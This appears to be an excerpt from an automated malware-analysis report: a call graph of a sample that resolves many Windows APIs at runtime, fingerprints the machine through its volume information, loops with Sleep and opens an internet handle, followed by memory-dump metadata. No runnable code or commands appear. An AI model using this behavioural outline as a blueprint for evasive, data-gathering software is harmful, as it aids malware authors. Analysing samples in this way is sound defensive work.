26147->26149 26148->26149 26150 c9160f lstrcpy 26149->26150 26151 c91617 26149->26151 26150->26151 26152 c90155 lstrlen 26151->26152 26153 c91647 lstrcpy 26151->26153 26152->25914 26153->26152 26155 c74a60 2 API calls 26154->26155 26156 c72e82 26155->26156 26157 c74a60 2 API calls 26156->26157 26158 c72ea0 26157->26158 26159 c74a60 2 API calls 26158->26159 
26160 c72eb6 26159->26160 26161 c74a60 2 API calls 26160->26161 26162 c72ecb 26161->26162 26163 c74a60 2 API calls 26162->26163 26164 c72eec 26163->26164 26165 c74a60 2 API calls 26164->26165 26166 c72f01 26165->26166 26167 c74a60 2 API calls 26166->26167 26168 c72f19 26167->26168 26169 c74a60 2 API calls 26168->26169 26170 c72f3a 26169->26170 26171 c74a60 2 API calls 26170->26171 26172 c72f4f 26171->26172 26173 c74a60 2 API calls 26172->26173 26174 c72f65 26173->26174 26175 c74a60 2 API calls 26174->26175 26176 c72f7b 26175->26176 26177 c74a60 2 API calls 26176->26177 26178 c72f91 26177->26178 26179 c74a60 2 API calls 26178->26179 26180 c72faa 26179->26180 26181 c74a60 2 API calls 26180->26181 26182 c72fc0 26181->26182 26183 c74a60 2 API calls 26182->26183 26184 c72fd6 26183->26184 26185 c74a60 2 API calls 26184->26185 26186 c72fec 26185->26186 26187 c74a60 2 API calls 26186->26187 26188 c73002 26187->26188 26189 c74a60 2 API calls 26188->26189 26190 c73018 26189->26190 26191 c74a60 2 API calls 26190->26191 26192 c73031 26191->26192 26193 c74a60 2 API calls 26192->26193 26194 c73047 26193->26194 26195 c74a60 2 API calls 26194->26195 26196 c7305d 26195->26196 26197 c74a60 2 API calls 26196->26197 26198 c73073 26197->26198 26199 c74a60 2 API calls 26198->26199 26200 c73089 26199->26200 26201 c74a60 2 API calls 26200->26201 26202 c7309f 26201->26202 26203 c74a60 2 API calls 26202->26203 26204 c730b8 26203->26204 26205 c74a60 2 API calls 26204->26205 26206 c730ce 26205->26206 26207 c74a60 2 API calls 26206->26207 26208 c730e4 26207->26208 26209 c74a60 2 API calls 26208->26209 26210 c730fa 26209->26210 26211 c74a60 2 API calls 26210->26211 26212 c73110 26211->26212 26213 c74a60 2 API calls 26212->26213 26214 c73126 26213->26214 26215 c74a60 2 API calls 26214->26215 26216 c7313f 26215->26216 26217 c74a60 2 API calls 26216->26217 26218 c73155 26217->26218 26219 c74a60 2 API calls 26218->26219 26220 c7316b 26219->26220 26221 c74a60 2 API calls 26220->26221 26222 c73181 
26221->26222 26223 c74a60 2 API calls 26222->26223 26224 c73197 26223->26224 26225 c74a60 2 API calls 26224->26225 26226 c731ad 26225->26226 26227 c74a60 2 API calls 26226->26227 26228 c731c6 26227->26228 26229 c74a60 2 API calls 26228->26229 26230 c731dc 26229->26230 26231 c74a60 2 API calls 26230->26231 26232 c731f2 26231->26232 26233 c74a60 2 API calls 26232->26233 26234 c73208 26233->26234 26235 c74a60 2 API calls 26234->26235 26236 c7321e 26235->26236 26237 c74a60 2 API calls 26236->26237 26238 c73234 26237->26238 26239 c74a60 2 API calls 26238->26239 26240 c7324d 26239->26240 26241 c74a60 2 API calls 26240->26241 26242 c73263 26241->26242 26243 c74a60 2 API calls 26242->26243 26244 c73279 26243->26244 26245 c74a60 2 API calls 26244->26245 26246 c7328f 26245->26246 26247 c74a60 2 API calls 26246->26247 26248 c732a5 26247->26248 26249 c74a60 2 API calls 26248->26249 26250 c732bb 26249->26250 26251 c74a60 2 API calls 26250->26251 26252 c732d4 26251->26252 26253 c74a60 2 API calls 26252->26253 26254 c732ea 26253->26254 26255 c74a60 2 API calls 26254->26255 26256 c73300 26255->26256 26257 c74a60 2 API calls 26256->26257 26258 c73316 26257->26258 26259 c74a60 2 API calls 26258->26259 26260 c7332c 26259->26260 26261 c74a60 2 API calls 26260->26261 26262 c73342 26261->26262 26263 c74a60 2 API calls 26262->26263 26264 c7335b 26263->26264 26265 c74a60 2 API calls 26264->26265 26266 c73371 26265->26266 26267 c74a60 2 API calls 26266->26267 26268 c73387 26267->26268 26269 c74a60 2 API calls 26268->26269 26270 c7339d 26269->26270 26271 c74a60 2 API calls 26270->26271 26272 c733b3 26271->26272 26273 c74a60 2 API calls 26272->26273 26274 c733c9 26273->26274 26275 c74a60 2 API calls 26274->26275 26276 c733e2 26275->26276 26277 c74a60 2 API calls 26276->26277 26278 c733f8 26277->26278 26279 c74a60 2 API calls 26278->26279 26280 c7340e 26279->26280 26281 c74a60 2 API calls 26280->26281 26282 c73424 26281->26282 26283 c74a60 2 API calls 26282->26283 26284 c7343a 26283->26284 
26285 c74a60 2 API calls 26284->26285 26286 c73450 26285->26286 26287 c74a60 2 API calls 26286->26287 26288 c73469 26287->26288 26289 c74a60 2 API calls 26288->26289 26290 c7347f 26289->26290 26291 c74a60 2 API calls 26290->26291 26292 c73495 26291->26292 26293 c74a60 2 API calls 26292->26293 26294 c734ab 26293->26294 26295 c74a60 2 API calls 26294->26295 26296 c734c1 26295->26296 26297 c74a60 2 API calls 26296->26297 26298 c734d7 26297->26298 26299 c74a60 2 API calls 26298->26299 26300 c734f0 26299->26300 26301 c74a60 2 API calls 26300->26301 26302 c73506 26301->26302 26303 c74a60 2 API calls 26302->26303 26304 c7351c 26303->26304 26305 c74a60 2 API calls 26304->26305 26306 c73532 26305->26306 26307 c74a60 2 API calls 26306->26307 26308 c73548 26307->26308 26309 c74a60 2 API calls 26308->26309 26310 c7355e 26309->26310 26311 c74a60 2 API calls 26310->26311 26312 c73577 26311->26312 26313 c74a60 2 API calls 26312->26313 26314 c7358d 26313->26314 26315 c74a60 2 API calls 26314->26315 26316 c735a3 26315->26316 26317 c74a60 2 API calls 26316->26317 26318 c735b9 26317->26318 26319 c74a60 2 API calls 26318->26319 26320 c735cf 26319->26320 26321 c74a60 2 API calls 26320->26321 26322 c735e5 26321->26322 26323 c74a60 2 API calls 26322->26323 26324 c735fe 26323->26324 26325 c74a60 2 API calls 26324->26325 26326 c73614 26325->26326 26327 c74a60 2 API calls 26326->26327 26328 c7362a 26327->26328 26329 c74a60 2 API calls 26328->26329 26330 c73640 26329->26330 26331 c74a60 2 API calls 26330->26331 26332 c73656 26331->26332 26333 c74a60 2 API calls 26332->26333 26334 c7366c 26333->26334 26335 c74a60 2 API calls 26334->26335 26336 c73685 26335->26336 26337 c74a60 2 API calls 26336->26337 26338 c7369b 26337->26338 26339 c74a60 2 API calls 26338->26339 26340 c736b1 26339->26340 26341 c74a60 2 API calls 26340->26341 26342 c736c7 26341->26342 26343 c74a60 2 API calls 26342->26343 26344 c736dd 26343->26344 26345 c74a60 2 API calls 26344->26345 26346 c736f3 26345->26346 26347 c74a60 2 
API calls 26346->26347 26348 c7370c 26347->26348 26349 c74a60 2 API calls 26348->26349 26350 c73722 26349->26350 26351 c74a60 2 API calls 26350->26351 26352 c73738 26351->26352 26353 c74a60 2 API calls 26352->26353 26354 c7374e 26353->26354 26355 c74a60 2 API calls 26354->26355 26356 c73764 26355->26356 26357 c74a60 2 API calls 26356->26357 26358 c7377a 26357->26358 26359 c74a60 2 API calls 26358->26359 26360 c73793 26359->26360 26361 c74a60 2 API calls 26360->26361 26362 c737a9 26361->26362 26363 c74a60 2 API calls 26362->26363 26364 c737bf 26363->26364 26365 c74a60 2 API calls 26364->26365 26366 c737d5 26365->26366 26367 c74a60 2 API calls 26366->26367 26368 c737eb 26367->26368 26369 c74a60 2 API calls 26368->26369 26370 c73801 26369->26370 26371 c74a60 2 API calls 26370->26371 26372 c7381a 26371->26372 26373 c74a60 2 API calls 26372->26373 26374 c73830 26373->26374 26375 c74a60 2 API calls 26374->26375 26376 c73846 26375->26376 26377 c74a60 2 API calls 26376->26377 26378 c7385c 26377->26378 26379 c74a60 2 API calls 26378->26379 26380 c73872 26379->26380 26381 c74a60 2 API calls 26380->26381 26382 c73888 26381->26382 26383 c74a60 2 API calls 26382->26383 26384 c738a1 26383->26384 26385 c74a60 2 API calls 26384->26385 26386 c738b7 26385->26386 26387 c74a60 2 API calls 26386->26387 26388 c738cd 26387->26388 26389 c74a60 2 API calls 26388->26389 26390 c738e3 26389->26390 26391 c74a60 2 API calls 26390->26391 26392 c738f9 26391->26392 26393 c74a60 2 API calls 26392->26393 26394 c7390f 26393->26394 26395 c74a60 2 API calls 26394->26395 26396 c73928 26395->26396 26397 c74a60 2 API calls 26396->26397 26398 c7393e 26397->26398 26399 c74a60 2 API calls 26398->26399 26400 c73954 26399->26400 26401 c74a60 2 API calls 26400->26401 26402 c7396a 26401->26402 26403 c74a60 2 API calls 26402->26403 26404 c73980 26403->26404 26405 c74a60 2 API calls 26404->26405 26406 c73996 26405->26406 26407 c74a60 2 API calls 26406->26407 26408 c739af 26407->26408 26409 c74a60 2 API calls 
26408->26409 26410 c739c5 26409->26410 26411 c74a60 2 API calls 26410->26411 26412 c739db 26411->26412 26413 c74a60 2 API calls 26412->26413 26414 c739f1 26413->26414 26415 c74a60 2 API calls 26414->26415 26416 c73a07 26415->26416 26417 c74a60 2 API calls 26416->26417 26418 c73a1d 26417->26418 26419 c74a60 2 API calls 26418->26419 26420 c73a36 26419->26420 26421 c74a60 2 API calls 26420->26421 26422 c73a4c 26421->26422 26423 c74a60 2 API calls 26422->26423 26424 c73a62 26423->26424 26425 c74a60 2 API calls 26424->26425 26426 c73a78 26425->26426 26427 c74a60 2 API calls 26426->26427 26428 c73a8e 26427->26428 26429 c74a60 2 API calls 26428->26429 26430 c73aa4 26429->26430 26431 c74a60 2 API calls 26430->26431 26432 c73abd 26431->26432 26433 c74a60 2 API calls 26432->26433 26434 c73ad3 26433->26434 26435 c74a60 2 API calls 26434->26435 26436 c73ae9 26435->26436 26437 c74a60 2 API calls 26436->26437 26438 c73aff 26437->26438 26439 c74a60 2 API calls 26438->26439 26440 c73b15 26439->26440 26441 c74a60 2 API calls 26440->26441 26442 c73b2b 26441->26442 26443 c74a60 2 API calls 26442->26443 26444 c73b44 26443->26444 26445 c74a60 2 API calls 26444->26445 26446 c73b5a 26445->26446 26447 c74a60 2 API calls 26446->26447 26448 c73b70 26447->26448 26449 c74a60 2 API calls 26448->26449 26450 c73b86 26449->26450 26451 c74a60 2 API calls 26450->26451 26452 c73b9c 26451->26452 26453 c74a60 2 API calls 26452->26453 26454 c73bb2 26453->26454 26455 c74a60 2 API calls 26454->26455 26456 c73bcb 26455->26456 26457 c74a60 2 API calls 26456->26457 26458 c73be1 26457->26458 26459 c74a60 2 API calls 26458->26459 26460 c73bf7 26459->26460 26461 c74a60 2 API calls 26460->26461 26462 c73c0d 26461->26462 26463 c74a60 2 API calls 26462->26463 26464 c73c23 26463->26464 26465 c74a60 2 API calls 26464->26465 26466 c73c39 26465->26466 26467 c74a60 2 API calls 26466->26467 26468 c73c52 26467->26468 26469 c74a60 2 API calls 26468->26469 26470 c73c68 26469->26470 26471 c74a60 2 API calls 26470->26471 
26472 c73c7e 26471->26472 26473 c74a60 2 API calls 26472->26473 26474 c73c94 26473->26474 26475 c74a60 2 API calls 26474->26475 26476 c73caa 26475->26476 26477 c74a60 2 API calls 26476->26477 26478 c73cc0 26477->26478 26479 c74a60 2 API calls 26478->26479 26480 c73cd9 26479->26480 26481 c74a60 2 API calls 26480->26481 26482 c73cef 26481->26482 26483 c74a60 2 API calls 26482->26483 26484 c73d05 26483->26484 26485 c74a60 2 API calls 26484->26485 26486 c73d1b 26485->26486 26487 c74a60 2 API calls 26486->26487 26488 c73d31 26487->26488 26489 c74a60 2 API calls 26488->26489 26490 c73d47 26489->26490 26491 c74a60 2 API calls 26490->26491 26492 c73d60 26491->26492 26493 c74a60 2 API calls 26492->26493 26494 c73d76 26493->26494 26495 c74a60 2 API calls 26494->26495 26496 c73d8c 26495->26496 26497 c74a60 2 API calls 26496->26497 26498 c73da2 26497->26498 26499 c74a60 2 API calls 26498->26499 26500 c73db8 26499->26500 26501 c74a60 2 API calls 26500->26501 26502 c73dce 26501->26502 26503 c74a60 2 API calls 26502->26503 26504 c73de7 26503->26504 26505 c74a60 2 API calls 26504->26505 26506 c73dfd 26505->26506 26507 c74a60 2 API calls 26506->26507 26508 c73e13 26507->26508 26509 c74a60 2 API calls 26508->26509 26510 c73e29 26509->26510 26511 c74a60 2 API calls 26510->26511 26512 c73e3f 26511->26512 26513 c74a60 2 API calls 26512->26513 26514 c73e55 26513->26514 26515 c74a60 2 API calls 26514->26515 26516 c73e6e 26515->26516 26517 c74a60 2 API calls 26516->26517 26518 c73e84 26517->26518 26519 c74a60 2 API calls 26518->26519 26520 c73e9a 26519->26520 26521 c74a60 2 API calls 26520->26521 26522 c73eb0 26521->26522 26523 c74a60 2 API calls 26522->26523 26524 c73ec6 26523->26524 26525 c74a60 2 API calls 26524->26525 26526 c73edc 26525->26526 26527 c74a60 2 API calls 26526->26527 26528 c73ef5 26527->26528 26529 c74a60 2 API calls 26528->26529 26530 c73f0b 26529->26530 26531 c74a60 2 API calls 26530->26531 26532 c73f21 26531->26532 26533 c74a60 2 API calls 26532->26533 26534 c73f37 
26533->26534 26535 c74a60 2 API calls 26534->26535 26536 c73f4d 26535->26536 26537 c74a60 2 API calls 26536->26537 26538 c73f63 26537->26538 26539 c74a60 2 API calls 26538->26539 26540 c73f7c 26539->26540 26541 c74a60 2 API calls 26540->26541 26542 c73f92 26541->26542 26543 c74a60 2 API calls 26542->26543 26544 c73fa8 26543->26544 26545 c74a60 2 API calls 26544->26545 26546 c73fbe 26545->26546 26547 c74a60 2 API calls 26546->26547 26548 c73fd4 26547->26548 26549 c74a60 2 API calls 26548->26549 26550 c73fea 26549->26550 26551 c74a60 2 API calls 26550->26551 26552 c74003 26551->26552 26553 c74a60 2 API calls 26552->26553 26554 c74019 26553->26554 26555 c74a60 2 API calls 26554->26555 26556 c7402f 26555->26556 26557 c74a60 2 API calls 26556->26557 26558 c74045 26557->26558 26559 c74a60 2 API calls 26558->26559 26560 c7405b 26559->26560 26561 c74a60 2 API calls 26560->26561 26562 c74071 26561->26562 26563 c74a60 2 API calls 26562->26563 26564 c7408a 26563->26564 26565 c74a60 2 API calls 26564->26565 26566 c740a0 26565->26566 26567 c74a60 2 API calls 26566->26567 26568 c740b6 26567->26568 26569 c74a60 2 API calls 26568->26569 26570 c740cc 26569->26570 26571 c74a60 2 API calls 26570->26571 26572 c740e2 26571->26572 26573 c74a60 2 API calls 26572->26573 26574 c740f8 26573->26574 26575 c74a60 2 API calls 26574->26575 26576 c74111 26575->26576 26577 c74a60 2 API calls 26576->26577 26578 c74127 26577->26578 26579 c74a60 2 API calls 26578->26579 26580 c7413d 26579->26580 26581 c74a60 2 API calls 26580->26581 26582 c74153 26581->26582 26583 c74a60 2 API calls 26582->26583 26584 c74169 26583->26584 26585 c74a60 2 API calls 26584->26585 26586 c7417f 26585->26586 26587 c74a60 2 API calls 26586->26587 26588 c74198 26587->26588 26589 c74a60 2 API calls 26588->26589 26590 c741ae 26589->26590 26591 c74a60 2 API calls 26590->26591 26592 c741c4 26591->26592 26593 c74a60 2 API calls 26592->26593 26594 c741da 26593->26594 26595 c74a60 2 API calls 26594->26595 26596 c741f0 26595->26596 
26597 c74a60 2 API calls 26596->26597 26598 c74206 26597->26598 26599 c74a60 2 API calls 26598->26599 26600 c7421f 26599->26600 26601 c74a60 2 API calls 26600->26601 26602 c74235 26601->26602 26603 c74a60 2 API calls 26602->26603 26604 c7424b 26603->26604 26605 c74a60 2 API calls 26604->26605 26606 c74261 26605->26606 26607 c74a60 2 API calls 26606->26607 26608 c74277 26607->26608 26609 c74a60 2 API calls 26608->26609 26610 c7428d 26609->26610 26611 c74a60 2 API calls 26610->26611 26612 c742a6 26611->26612 26613 c74a60 2 API calls 26612->26613 26614 c742bc 26613->26614 26615 c74a60 2 API calls 26614->26615 26616 c742d2 26615->26616 26617 c74a60 2 API calls 26616->26617 26618 c742e8 26617->26618 26619 c74a60 2 API calls 26618->26619 26620 c742fe 26619->26620 26621 c74a60 2 API calls 26620->26621 26622 c74314 26621->26622 26623 c74a60 2 API calls 26622->26623 26624 c7432d 26623->26624 26625 c74a60 2 API calls 26624->26625 26626 c74343 26625->26626 26627 c74a60 2 API calls 26626->26627 26628 c74359 26627->26628 26629 c74a60 2 API calls 26628->26629 26630 c7436f 26629->26630 26631 c74a60 2 API calls 26630->26631 26632 c74385 26631->26632 26633 c74a60 2 API calls 26632->26633 26634 c7439b 26633->26634 26635 c74a60 2 API calls 26634->26635 26636 c743b4 26635->26636 26637 c74a60 2 API calls 26636->26637 26638 c743ca 26637->26638 26639 c74a60 2 API calls 26638->26639 26640 c743e0 26639->26640 26641 c74a60 2 API calls 26640->26641 26642 c743f6 26641->26642 26643 c74a60 2 API calls 26642->26643 26644 c7440c 26643->26644 26645 c74a60 2 API calls 26644->26645 26646 c74422 26645->26646 26647 c74a60 2 API calls 26646->26647 26648 c7443b 26647->26648 26649 c74a60 2 API calls 26648->26649 26650 c74451 26649->26650 26651 c74a60 2 API calls 26650->26651 26652 c74467 26651->26652 26653 c74a60 2 API calls 26652->26653 26654 c7447d 26653->26654 26655 c74a60 2 API calls 26654->26655 26656 c74493 26655->26656 26657 c74a60 2 API calls 26656->26657 26658 c744a9 26657->26658 26659 c74a60 2 
API calls 26658->26659 26660 c744c2 26659->26660 26661 c74a60 2 API calls 26660->26661 26662 c744d8 26661->26662 26663 c74a60 2 API calls 26662->26663 26664 c744ee 26663->26664 26665 c74a60 2 API calls 26664->26665 26666 c74504 26665->26666 26667 c74a60 2 API calls 26666->26667 26668 c7451a 26667->26668 26669 c74a60 2 API calls 26668->26669 26670 c74530 26669->26670 26671 c74a60 2 API calls 26670->26671 26672 c74549 26671->26672 26673 c74a60 2 API calls 26672->26673 26674 c7455f 26673->26674 26675 c74a60 2 API calls 26674->26675 26676 c74575 26675->26676 26677 c74a60 2 API calls 26676->26677 26678 c7458b 26677->26678 26679 c74a60 2 API calls 26678->26679 26680 c745a1 26679->26680 26681 c74a60 2 API calls 26680->26681 26682 c745b7 26681->26682 26683 c74a60 2 API calls 26682->26683 26684 c745d0 26683->26684 26685 c74a60 2 API calls 26684->26685 26686 c745e6 26685->26686 26687 c74a60 2 API calls 26686->26687 26688 c745fc 26687->26688 26689 c74a60 2 API calls 26688->26689 26690 c74612 26689->26690 26691 c74a60 2 API calls 26690->26691 26692 c74628 26691->26692 26693 c74a60 2 API calls 26692->26693 26694 c7463e 26693->26694 26695 c74a60 2 API calls 26694->26695 26696 c74657 26695->26696 26697 c74a60 2 API calls 26696->26697 26698 c7466d 26697->26698 26699 c74a60 2 API calls 26698->26699 26700 c74683 26699->26700 26701 c74a60 2 API calls 26700->26701 26702 c74699 26701->26702 26703 c74a60 2 API calls 26702->26703 26704 c746af 26703->26704 26705 c74a60 2 API calls 26704->26705 26706 c746c5 26705->26706 26707 c74a60 2 API calls 26706->26707 26708 c746de 26707->26708 26709 c74a60 2 API calls 26708->26709 26710 c746f4 26709->26710 26711 c74a60 2 API calls 26710->26711 26712 c7470a 26711->26712 26713 c74a60 2 API calls 26712->26713 26714 c74720 26713->26714 26715 c74a60 2 API calls 26714->26715 26716 c74736 26715->26716 26717 c74a60 2 API calls 26716->26717 26718 c7474c 26717->26718 26719 c74a60 2 API calls 26718->26719 26720 c74765 26719->26720 26721 c74a60 2 API calls 
26720->26721 26722 c7477b 26721->26722 26723 c74a60 2 API calls 26722->26723 26724 c74791 26723->26724 26725 c74a60 2 API calls 26724->26725 26726 c747a7 26725->26726 26727 c74a60 2 API calls 26726->26727 26728 c747bd 26727->26728 26729 c74a60 2 API calls 26728->26729 26730 c747d3 26729->26730 26731 c74a60 2 API calls 26730->26731 26732 c747ec 26731->26732 26733 c74a60 2 API calls 26732->26733 26734 c74802 26733->26734 26735 c74a60 2 API calls 26734->26735 26736 c74818 26735->26736 26737 c74a60 2 API calls 26736->26737 26738 c7482e 26737->26738 26739 c74a60 2 API calls 26738->26739 26740 c74844 26739->26740 26741 c74a60 2 API calls 26740->26741 26742 c7485a 26741->26742 26743 c74a60 2 API calls 26742->26743 26744 c74873 26743->26744 26745 c74a60 2 API calls 26744->26745 26746 c74889 26745->26746 26747 c74a60 2 API calls 26746->26747 26748 c7489f 26747->26748 26749 c74a60 2 API calls 26748->26749 26750 c748b5 26749->26750 26751 c74a60 2 API calls 26750->26751 26752 c748cb 26751->26752 26753 c74a60 2 API calls 26752->26753 26754 c748e1 26753->26754 26755 c74a60 2 API calls 26754->26755 26756 c748fa 26755->26756 26757 c74a60 2 API calls 26756->26757 26758 c74910 26757->26758 26759 c74a60 2 API calls 26758->26759 26760 c74926 26759->26760 26761 c74a60 2 API calls 26760->26761 26762 c7493c 26761->26762 26763 c74a60 2 API calls 26762->26763 26764 c74952 26763->26764 26765 c74a60 2 API calls 26764->26765 26766 c74968 26765->26766 26767 c74a60 2 API calls 26766->26767 26768 c74981 26767->26768 26769 c74a60 2 API calls 26768->26769 26770 c74997 26769->26770 26771 c74a60 2 API calls 26770->26771 26772 c749ad 26771->26772 26773 c74a60 2 API calls 26772->26773 26774 c749c3 26773->26774 26775 c74a60 2 API calls 26774->26775 26776 c749d9 26775->26776 26777 c74a60 2 API calls 26776->26777 26778 c749ef 26777->26778 26779 c74a60 2 API calls 26778->26779 26780 c74a08 26779->26780 26781 c74a60 2 API calls 26780->26781 26782 c74a1e 26781->26782 26783 c74a60 2 API calls 26782->26783 
26784 c74a34 26783->26784 26785 c74a60 2 API calls 26784->26785 26786 c74a4a 26785->26786 26787 c966e0 26786->26787 26788 c966ed 43 API calls 26787->26788 26789 c96afe 8 API calls 26787->26789 26788->26789 26790 c96c08 26789->26790 26791 c96b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26789->26791 26792 c96cd2 26790->26792 26793 c96c15 8 API calls 26790->26793 26791->26790 26794 c96cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26792->26794 26795 c96d4f 26792->26795 26793->26792 26794->26795 26796 c96de9 26795->26796 26797 c96d5c 6 API calls 26795->26797 26798 c96f10 26796->26798 26799 c96df6 12 API calls 26796->26799 26797->26796 26800 c96f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26798->26800 26801 c96f8d 26798->26801 26799->26798 26800->26801 26802 c96fc1 26801->26802 26803 c96f96 GetProcAddress GetProcAddress 26801->26803 26804 c96fca GetProcAddress GetProcAddress 26802->26804 26805 c96ff5 26802->26805 26803->26802 26804->26805 26806 c970ed 26805->26806 26807 c97002 10 API calls 26805->26807 26808 c97152 26806->26808 26809 c970f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26806->26809 26807->26806 26810 c9715b GetProcAddress 26808->26810 26811 c9716e 26808->26811 26809->26808 26810->26811 26812 c9051f 26811->26812 26813 c97177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26811->26813 26814 c71530 26812->26814 26813->26812 27123 c71610 26814->27123 26816 c7153b 26817 c71555 lstrcpy 26816->26817 26818 c7155d 26816->26818 26817->26818 26819 c71577 lstrcpy 26818->26819 26820 c7157f 26818->26820 26819->26820 26821 c71599 lstrcpy 26820->26821 26822 c715a1 26820->26822 26821->26822 26823 c71605 26822->26823 26824 c715fd lstrcpy 26822->26824 26825 c8f1b0 lstrlen 26823->26825 26824->26823 26826 c8f1e4 26825->26826 26827 c8f1eb lstrcpy 26826->26827 26828 c8f1f7 lstrlen 26826->26828 26827->26828 26829 c8f208 26828->26829 26830 c8f21b 
lstrlen 26829->26830 26831 c8f20f lstrcpy 26829->26831 26832 c8f22c 26830->26832 26831->26830 26833 c8f233 lstrcpy 26832->26833 26834 c8f23f 26832->26834 26833->26834 26835 c8f258 lstrcpy 26834->26835 26836 c8f264 26834->26836 26835->26836 26837 c8f286 lstrcpy 26836->26837 26838 c8f292 26836->26838 26837->26838 26839 c8f2ba lstrcpy 26838->26839 26840 c8f2c6 26838->26840 26839->26840 26841 c8f2ea lstrcpy 26840->26841 26842 c8f300 26840->26842 26841->26842 26843 c8f30c lstrlen 26842->26843 26844 c8f4b9 lstrcpy 26842->26844 26845 c8f3a1 lstrcpy 26842->26845 26846 c8f3c5 lstrcpy 26842->26846 26847 c8f4e8 lstrcpy 26842->26847 26848 c8f479 lstrcpy 26842->26848 26849 c8f70f StrCmpCA 26842->26849 26852 c8fa29 StrCmpCA 26842->26852 26853 c8f73e lstrlen 26842->26853 26856 c8fd4d StrCmpCA 26842->26856 26858 c8fa58 lstrlen 26842->26858 26865 c8f89e lstrcpy 26842->26865 26870 c8f76f lstrcpy 26842->26870 26873 c8fbb8 lstrcpy 26842->26873 26875 c8fa89 lstrcpy 26842->26875 26879 c8f8cd lstrcpy 26842->26879 26881 c8f791 lstrcpy 26842->26881 26883 c71530 8 API calls 26842->26883 26885 c8fbe7 lstrcpy 26842->26885 26889 c8faab lstrcpy 26842->26889 26892 c8ee90 28 API calls 26842->26892 26897 c8f7e2 lstrcpy 26842->26897 26900 c8fafc lstrcpy 26842->26900 26906 c8f4f0 26842->26906 26843->26842 26844->26842 26845->26842 26846->26842 26847->26906 26848->26842 26849->26842 26855 c8fe8e 26849->26855 26850 c8f616 StrCmpCA 26850->26849 26850->26906 26851 c8f59c lstrcpy 26851->26906 26852->26842 26863 c8fe2b 26852->26863 26853->26842 26854 c8fead lstrlen 26866 c8fec7 26854->26866 26855->26854 26857 c8fea5 lstrcpy 26855->26857 26859 c8fd60 Sleep 26856->26859 26868 c8fd75 26856->26868 26857->26854 26858->26842 26859->26842 26860 c8f64a lstrcpy 26860->26906 26861 c71530 8 API calls 26861->26906 26862 c8fe4a lstrlen 26876 c8fe64 26862->26876 26863->26862 26864 c8fe42 lstrcpy 26863->26864 26864->26862 26865->26842 26867 c8fee7 lstrlen 26866->26867 26871 c8fedf lstrcpy 26866->26871 26874 c8ff01 
26867->26874 26869 c8fd94 lstrlen 26868->26869 26872 c8fd8c lstrcpy 26868->26872 26878 c8fdae 26869->26878 26870->26842 26871->26867 26872->26869 26873->26842 26884 c8ff21 26874->26884 26887 c8ff19 lstrcpy 26874->26887 26875->26842 26877 c8fdce lstrlen 26876->26877 26880 c8fe7c lstrcpy 26876->26880 26886 c8fde8 26877->26886 26878->26877 26891 c8fdc6 lstrcpy 26878->26891 26879->26906 26880->26877 26881->26842 26883->26842 26888 c71610 4 API calls 26884->26888 26885->26906 26893 c8fe08 26886->26893 26895 c8fe00 lstrcpy 26886->26895 26887->26884 26909 c8fe13 26888->26909 26889->26842 26890 c8f698 lstrcpy 26890->26906 26891->26877 26892->26842 26896 c71610 4 API calls 26893->26896 26894 c8efb0 35 API calls 26894->26906 26895->26893 26896->26909 26897->26842 26898 c8f924 lstrcpy 26898->26906 26899 c8f99e StrCmpCA 26899->26852 26899->26906 26900->26842 26901 c8fc3e lstrcpy 26901->26906 26902 c8fcb8 StrCmpCA 26902->26856 26902->26906 26903 c8f9cb lstrcpy 26903->26906 26904 c8fce9 lstrcpy 26904->26906 26905 c8ee90 28 API calls 26905->26906 26906->26842 26906->26850 26906->26851 26906->26852 26906->26856 26906->26860 26906->26861 26906->26890 26906->26894 26906->26898 26906->26899 26906->26901 26906->26902 26906->26903 26906->26904 26906->26905 26907 c8fa19 lstrcpy 26906->26907 26908 c8fd3a lstrcpy 26906->26908 26907->26906 26908->26906 26909->25933 26911 c9278c GetVolumeInformationA 26910->26911 26912 c92785 26910->26912 26913 c927ec GetProcessHeap RtlAllocateHeap 26911->26913 26912->26911 26915 c92822 26913->26915 26916 c92826 wsprintfA 26913->26916 27133 c971e0 26915->27133 26916->26915 26920 c74c70 26919->26920 26921 c74c85 26920->26921 26922 c74c7d lstrcpy 26920->26922 27137 c74bc0 26921->27137 26922->26921 26924 c74c90 26925 c74ccc lstrcpy 26924->26925 26926 c74cd8 26924->26926 26925->26926 26927 c74cff lstrcpy 26926->26927 26928 c74d0b 26926->26928 26927->26928 26929 c74d2f lstrcpy 26928->26929 26930 c74d3b 26928->26930 26929->26930 26931 c74d6d lstrcpy 26930->26931 
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C74C7F
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C74CD2
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C74D05
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C74D35
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C74D73
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C74DA6
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C74DB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
